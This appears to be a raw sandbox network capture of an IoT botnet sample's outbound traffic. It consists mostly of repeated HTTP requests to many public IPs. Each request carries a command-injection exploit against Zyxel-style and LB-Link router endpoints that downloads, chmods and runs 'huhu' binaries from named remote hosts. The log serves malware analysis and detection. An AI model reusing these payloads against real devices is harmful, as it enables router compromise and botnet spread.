                                                Jan 29, 2024 07:07:43.217289925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3152192.168.2.2352970113.54.216.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217344046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3153192.168.2.2360078186.93.249.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217379093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3154192.168.2.235680675.226.99.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217415094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3155192.168.2.2353006138.20.76.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217448950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3156192.168.2.2347988131.161.76.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217504025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3157192.168.2.233342653.217.31.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217547894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3158192.168.2.2340302105.85.164.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217580080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3159192.168.2.2355016221.85.74.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217633009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3160192.168.2.2355036202.115.38.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217667103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3161192.168.2.235558278.153.63.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217695951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3162192.168.2.23536768.92.166.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217715979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3163192.168.2.2338384152.183.228.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217778921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3164192.168.2.2345640135.137.205.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217812061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3165192.168.2.2341542121.121.188.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217832088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3166192.168.2.234585870.153.107.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217869997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3167192.168.2.234494851.111.64.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217914104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3168192.168.2.2353940157.128.227.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217946053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3169192.168.2.2356476140.58.172.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.217959881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3170192.168.2.2353762191.205.117.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218012094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3171192.168.2.2348580113.120.156.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218044996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3172192.168.2.2343226129.177.249.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218086004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3173192.168.2.233287099.134.105.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218122005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3174192.168.2.2341300164.208.138.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218178988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3175192.168.2.2337154118.34.179.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218213081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3176192.168.2.2360740110.174.93.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218262911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3177192.168.2.2346928222.232.181.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218271017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3178192.168.2.235706490.12.219.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218319893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3179192.168.2.2343870141.252.158.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218369961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3180192.168.2.235618845.185.153.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218415022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3181192.168.2.2340358146.105.158.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218447924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3182192.168.2.2338374126.0.230.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218554974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3183192.168.2.233907083.31.85.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218585968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3184192.168.2.2338106218.189.129.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218633890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3185192.168.2.2360294184.41.213.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218664885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3186192.168.2.234893096.172.187.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218696117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3187192.168.2.2344418119.92.156.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218743086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3188192.168.2.2358920161.41.182.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218784094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3189192.168.2.234566488.107.219.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218832016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3190192.168.2.2353008211.128.246.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218862057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3191192.168.2.2344814125.136.105.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218895912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192192.168.2.235594697.22.251.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218924046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3193192.168.2.235807298.127.4.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218981028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3194192.168.2.235947890.101.209.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.218997955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3195192.168.2.2333596108.206.148.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219032049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3196192.168.2.2336938163.74.241.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219080925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3197192.168.2.2344362144.18.63.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219104052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3198192.168.2.2342936182.104.114.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219130993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3199192.168.2.2340280219.187.203.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219155073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3200192.168.2.2351150106.75.148.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219197989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3201192.168.2.235227060.155.241.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219238997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3202192.168.2.2334330133.21.204.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219269991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3203192.168.2.2333078188.230.222.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219317913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3204192.168.2.234096619.143.217.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219358921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3205192.168.2.233418269.199.196.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.219388008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3206192.168.2.2340850200.179.126.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.222523928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3207192.168.2.2353324119.98.87.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.222551107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3208192.168.2.2349010169.155.62.268080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.292915106 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3209192.168.2.2337358139.216.141.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231228113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3210192.168.2.2336990173.223.48.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231277943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3211192.168.2.2338012204.136.61.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231288910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3212192.168.2.2343466160.37.118.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231349945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3213192.168.2.2337302139.87.159.180443
                                                TimestampBytes transferredDirectionData
